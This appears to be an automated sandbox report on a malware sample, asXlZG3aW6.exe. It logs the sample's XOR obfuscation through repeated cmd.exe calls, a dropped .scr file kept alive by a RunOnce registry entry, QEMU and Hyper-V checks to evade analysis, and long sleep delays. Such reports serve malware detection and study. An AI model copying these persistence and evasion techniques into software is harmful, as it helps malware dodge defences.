              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2806 push ecx; ret 130_2_367B2819
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044693D push ecx; ret 131_2_0044694D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044DB70 push eax; ret 131_2_0044DB84
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044DB70 push eax; ret 131_2_0044DBAC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00451D54 push eax; ret 131_2_00451D61
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044B090 push eax; ret 132_2_0044B0A4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044B090 push eax; ret 132_2_0044B0CC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00451D34 push eax; ret 132_2_00451D41
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00444E71 push ecx; ret 132_2_00444E81
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414060 push eax; ret 133_2_00414074
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414060 push eax; ret 133_2_0041409C
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414039 push ecx; ret 133_2_00414049
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004164EB push 0000006Ah; retf 133_2_004165C4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00416553 push 0000006Ah; retf 133_2_004165C4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00416555 push 0000006Ah; retf 133_2_004165C4

              Persistence and Installation Behavior

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll

              Boot Survival

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API/Special instruction interceptor: Address: 19D5524
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Program Files\qga\qga.exe
Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000468000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
Source: asXlZG3aW6.exe, 00000000.00000002.21760824422.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269970469.0000000006D90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: IHJC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000496000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEJE
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Window / User API: threadDelayed 9468
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Window / User API: foregroundWindowGot 1756
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API coverage: 4.7 %
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API coverage: 10.0 %
Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 5840 | Thread sleep count: 270 > 30
Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 5840 | Thread sleep time: -135000s >= -30000s
Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424 | Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424 | Thread sleep count: 9468 > 30
Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424 | Thread sleep time: -28404000s >= -30000s
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_00406268 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004026F8 FindFirstFileA
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_00406268 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_004026F8 LdrInitializeThunk,FindFirstFileA
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B6580 FindFirstFileExA
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00418981 memset,GetSystemInfo
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: asXlZG3aW6.exe, 00000000.00000002.21760824422.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269970469.0000000006D90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ihJC:\Program Files\Qemu-ga\qemu-ga.exe
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000468000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWCookies
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000496000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeje
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API call chain: ExitProcess graph end node (graph_0-4030)
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API call chain: ExitProcess graph end node (graph_0-4219)
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | API call chain: ExitProcess graph end node (graph_132-34113)
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_00402D48 GetTempPathA,GetTickCount,GetModuleFileNameA,LdrInitializeThunk,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,SetFilePointer
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B4AB4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B724E GetProcessHeap
